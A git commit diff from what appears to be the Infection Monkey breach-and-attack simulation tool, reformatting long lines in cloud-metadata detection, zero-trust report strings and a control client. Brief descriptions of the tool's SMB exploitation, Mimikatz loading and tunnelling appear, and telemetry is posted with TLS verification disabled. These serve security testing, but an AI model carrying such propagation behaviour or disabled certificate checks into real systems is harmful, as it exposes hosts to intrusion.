All E501 errors fixed, but formatting screwed up

VakarisZ 2021-04-07 11:11:09 +03:00 committed by Mike Salvatore
parent ad2b2f88f5
commit 03bcfc97af
361 changed files with 6078 additions and 5521 deletions
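Most of the hunks below fix E501 (line too long) by splitting one long string literal into adjacent literals inside the existing parentheses; Python concatenates adjacent literals at compile time, so the logged message is unchanged. A minimal sketch of the before/after, using the message from the first hunk as the illustration:

```python
import logging

LOGGER = logging.getLogger(__name__)

# Before: one literal longer than the line-length limit.
LOGGER.warning(
    "Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done investigating."  # noqa: E501
)

# After: the same message split into adjacent literals, which the compiler
# joins back into a single string.
LOGGER.warning(
    "Calling breakpoint - pausing to enable investigation of island. "
    "Type 'c' to continue once you're done investigating."
)
```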

View File

@ -33,7 +33,8 @@ class PerformanceAnalyzer(Analyzer):
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
"Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
"Calling breakpoint - pausing to enable investigation of island. "
"Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()

View File

@ -1,6 +1,7 @@
import random
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
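The import hunks in this commit wrap the over-long module path with a backslash continuation. A sketch of the two equivalent spellings, using a standard-library module as a stand-in for the long envs.monkey_zoo path so the snippet actually runs:

```python
# Backslash continuation inside the dotted path (the style used above);
# Python tokenizes "unittest. mock" the same as "unittest.mock".
from unittest.\
    mock import MagicMock

# More common alternative: keep the dotted path intact and wrap the names.
from unittest.mock import (
    MagicMock as _MagicMock,
)

assert MagicMock is _MagicMock
```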

View File

@ -9,10 +9,12 @@ from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_monkey import (
FakeMonkey,
)

View File

@ -1,6 +1,7 @@
from unittest import TestCase
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)

View File

@ -9,7 +9,6 @@ from common.cloud.instance import CloudInstance
__author__ = "itay.mizeretz"
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
@ -49,7 +48,8 @@ class AwsInstance(CloudInstance):
try:
self.account_id = self._extract_account_id(
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
timeout=2
).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
@ -60,7 +60,8 @@ class AwsInstance(CloudInstance):
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts
# .RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
@ -79,9 +80,11 @@ class AwsInstance(CloudInstance):
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more
solutions,
in case Amazon break this mechanism.
:param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
:param instance_identity_document_response: json returned via the web page
../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]
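The two docstrings above describe pulling the account id out of the dynamic/instance-identity/document response and pulling the region out of an availability-zone string. A small sketch with made-up values showing both extractions:

```python
import json
import re

# Illustrative instance-identity document (values are made up).
instance_identity_document = '{"accountId": "123456789012", "region": "us-west-2"}'
print(json.loads(instance_identity_document)["accountId"])  # 123456789012

# The same region regex as above, applied to an availability-zone string.
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
print(re.findall(re_phrase, "us-west-2a", re.IGNORECASE))  # ['us-west-2']
```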

View File

@ -31,12 +31,14 @@ def filter_instance_data_from_aws_response(response):
class AwsService(object):
"""
A wrapper class around the boto3 client and session modules, which supplies various AWS services.
A wrapper class around the boto3 client and session modules, which supplies various AWS
services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role
for details.
"""
region = None
@ -73,7 +75,8 @@ class AwsService(object):
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam
-role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance

View File

@ -30,7 +30,6 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
}
"""
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
EXPECTED_REGION = "us-west-2"

View File

@ -9,7 +9,8 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
"http://169.254.169.254/metadata/instance?api-version=%s" %
LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@ -18,7 +19,8 @@ logger = logging.getLogger(__name__)
class AzureInstance(CloudInstance):
"""
Access to useful information about the current machine if it's an Azure VM.
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
Based on Azure metadata service:
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
@ -44,7 +46,8 @@ class AzureInstance(CloudInstance):
)
# If not on cloud, the metadata URL is non-routable and the connection will fail.
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
# If on AWS, should get 404 since the metadata service URL is different,
# so bool(response) will be false.
if response:
logger.debug("Trying to parse Azure metadata.")
self.try_parse_response(response)
@ -52,7 +55,8 @@ class AzureInstance(CloudInstance):
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug(
"Failed to get response from Azure metadata service: This instance is not on Azure."
"Failed to get response from Azure metadata service: This instance is not on "
"Azure."
)
def try_parse_response(self, response):
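For context on the URL being wrapped above, a sketch of probing the Azure metadata service. The `Metadata: true` header and the 2-second timeout are assumptions (the real code imports SHORT_REQUEST_TIMEOUT); the URL and API version come from the hunk:

```python
import requests

LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
    "http://169.254.169.254/metadata/instance?api-version=%s"
    % LATEST_AZURE_METADATA_API_VERSION
)

try:
    # Off Azure this address is non-routable, so the request simply times out.
    response = requests.get(
        AZURE_METADATA_SERVICE_URL, headers={"Metadata": "true"}, timeout=2
    )
    print("Metadata service answered:", response.status_code)
except requests.RequestException:
    print("Not an Azure VM (or the metadata service is unreachable).")
```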

View File

@ -30,7 +30,8 @@ GOOD_DATA = {
],
"publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName":"macikgo-test-may-23",
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
"resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
"sku":"Windows-Server-2012-R2-Datacenter",
@ -101,12 +102,16 @@ GOOD_DATA = {
},
}
BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<title>Waiting...</title>\n<script type="text/\
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
BAD_DATA_NOT_JSON = (
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta '
'content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" '
"/>\n<title>Waiting...</title>\n<script type=\"text/\
javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> "
"</body>\n</html>\n"
)
BAD_DATA_JSON = {"":""}

View File

@ -8,13 +8,13 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
logger = logging.getLogger(__name__)
GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
class GcpInstance(CloudInstance):
"""
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving
-metadata#runninggce
"""
def is_instance(self):

View File

@ -20,7 +20,8 @@ class AwsCmdResult(CmdResult):
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
Determines whether the command was successful. If it timed out and was still in progress,
we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.

View File

@ -21,8 +21,10 @@ class CmdRunner(object):
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
* command info - Any consistent structure representing additional information of a command which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
* command info - Any consistent structure representing additional information of a command
which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id'
as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
@ -49,7 +51,8 @@ class CmdRunner(object):
"""
Run multiple commands on various instances
:param instances: List of instances.
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously
and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value
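A simplified, synchronous sketch of the run-multiple-commands contract described in the docstring above (the real CmdRunner runs the commands asynchronously and polls their status); the lambdas are placeholders:

```python
def run_multiple_commands(instances, inst_to_cmd, inst_n_cmd_res_to_res):
    results = {}
    for instance in instances:
        cmd = inst_to_cmd(instance)
        # In the real class `cmd` is an async handle that gets polled; here we
        # treat it as the finished result to keep the sketch self-contained.
        results[instance["instance_id"]] = inst_n_cmd_res_to_res(instance, cmd)
    return results


print(
    run_multiple_commands(
        [{"instance_id": "i-1"}, {"instance_id": "i-2"}],
        inst_to_cmd=lambda inst: f"ran on {inst['instance_id']}",
        inst_n_cmd_res_to_res=lambda inst, res: res.upper(),
    )
)
# {'i-1': 'RAN ON I-1', 'i-2': 'RAN ON I-2'}
```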

View File

@ -1,8 +1,10 @@
"""
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
This file contains all the static data relating to Zero Trust. It is mostly used in the zero
trust report generation and
in creating findings.
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
This file contains static mappings between zero trust components such as: pillars, principles,
tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
@ -79,15 +81,22 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your "
""
""
"network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
"security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
"possible.",
PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
"should be MAC (Mandatory "
"Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
"recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
}
@ -99,32 +108,40 @@ FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
TEST_SEGMENTATION:{
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can "
"communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and"
" logs.",
STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, "
"check firewall logs.",
},
PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
TEST_MALICIOUS_ACTIVITY_TIMELINE:{
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking "
"actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and "
"alerts."
},
PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_ENDPOINT_SECURITY_EXISTS:{
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an "
"endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and "
"activate anti-virus "
"software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to "
"see if Monkey was a "
"security concern. ",
},
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
@ -132,9 +149,11 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_MACHINE_EXPLOITED:{
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to "
"breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
"activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.",
},
@ -145,7 +164,8 @@ TESTS_MAP = {
TEST_SCHEDULED_EXECUTION:{
TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in "
"User-Behavior security "
"software.",
STATUS_PASSED:"Monkey failed to execute in a scheduled manner.",
},
@ -154,10 +174,13 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_DATA_ENDPOINT_ELASTIC:{
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to "
"ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by "
"encrypting it in in-transit.",
STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such "
"instances, look for alerts "
"that indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
@ -165,10 +188,12 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_HTTP:{
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in"
" in-transit.",
STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, "
"look for alerts that indicate "
"attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
@ -176,10 +201,12 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_POSTGRESQL:{
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
" it in in-transit.",
STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, "
"look for alerts that "
"indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
@ -189,7 +216,8 @@ TESTS_MAP = {
TEST_TUNNELING:{
TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies "
"are too permissive - "
"restrict them. "
},
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
@ -197,9 +225,11 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED],
},
TEST_COMMUNICATE_AS_NEW_USER:{
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate "
"with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies "
"are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.",
},
@ -218,7 +248,7 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_UNENCRYPTED_DATA:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources with unencrypted data.",
STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.",
@ -228,7 +258,8 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not "
"protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources not protected against data loss.",
STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.",
@ -238,7 +269,7 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found issues related to users' authentication.",
STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.",
@ -248,7 +279,7 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found permissive user access policies.",
STATUS_PASSED:"ScoutSuite found no issues related to user access policies.",

View File

@ -159,7 +159,8 @@ class SingleIpRange(NetworkRange):
@staticmethod
def string_to_host(string_):
"""
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name
and ip
:param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""

View File

@ -4,8 +4,10 @@ from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (https://tools.ietf.org/html/rfc1738#section-3.1)
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (
https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (
https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""

View File

@ -14,8 +14,10 @@ def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
:param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
:param subnet: Subnet to check if one of ip_addresses is in there. This is
common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise
returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):
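An equivalent check sketched with the standard ipaddress module, since NetworkRange is project-specific; the subnet is assumed to be given in CIDR notation:

```python
import ipaddress


def get_ip_if_in_subnet(ip_addresses, subnet):
    network = ipaddress.ip_network(subnet)
    for ip_address in ip_addresses:
        if ipaddress.ip_address(ip_address) in network:
            return ip_address
    return None


print(get_ip_if_in_subnet(["192.168.1.5", "10.0.0.7"], "10.0.0.0/24"))  # 10.0.0.7
```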

View File

@ -15,7 +15,8 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service "
"via MS-SCMR.",
}
MIMIKATZ = {
ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.",
@ -29,7 +30,8 @@ class UsageEnum(Enum):
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's "
"process.",
ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton"
" for monkey process wasn't successful.",
}

View File

@ -1,4 +1,5 @@
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for
# details).
import argparse
from pathlib import Path
@ -17,7 +18,8 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
"-b", "--build", default=BUILD, help="Choose the build string for this version.",
type=str
)
args = parser.parse_args()
print(get_version(args.build))

View File

@ -227,7 +227,8 @@ class Configuration(object):
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data
plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.
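A sketch of hash_sensitive_data consistent with the docstring above; SHA-512 is an assumption taken from the "(SHA-512)" markers in the log messages elsewhere in this diff:

```python
import hashlib


def hash_sensitive_data(sensitive_data):
    return hashlib.sha512(sensitive_data.encode()).hexdigest()


print(hash_sensitive_data("hunter2")[:16] + "...")  # truncated digest for display
```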

View File

@ -23,7 +23,6 @@ from infection_monkey.utils.exceptions.planned_shutdown_exception import Planned
__author__ = "hoffer"
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@ -32,7 +31,8 @@ DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# random number greater than 5,
# to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere.
# to prevent the monkey from just waiting forever to try and connect to an island before going
# elsewhere.
TIMEOUT_IN_SECONDS = 15
@ -141,7 +141,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -156,7 +157,8 @@ class ControlClient(object):
try:
telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}
requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
"https://%s/api/telemetry" % (WormConfiguration.current_server,),
# noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type":"application/json"},
verify=False,
@ -165,7 +167,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
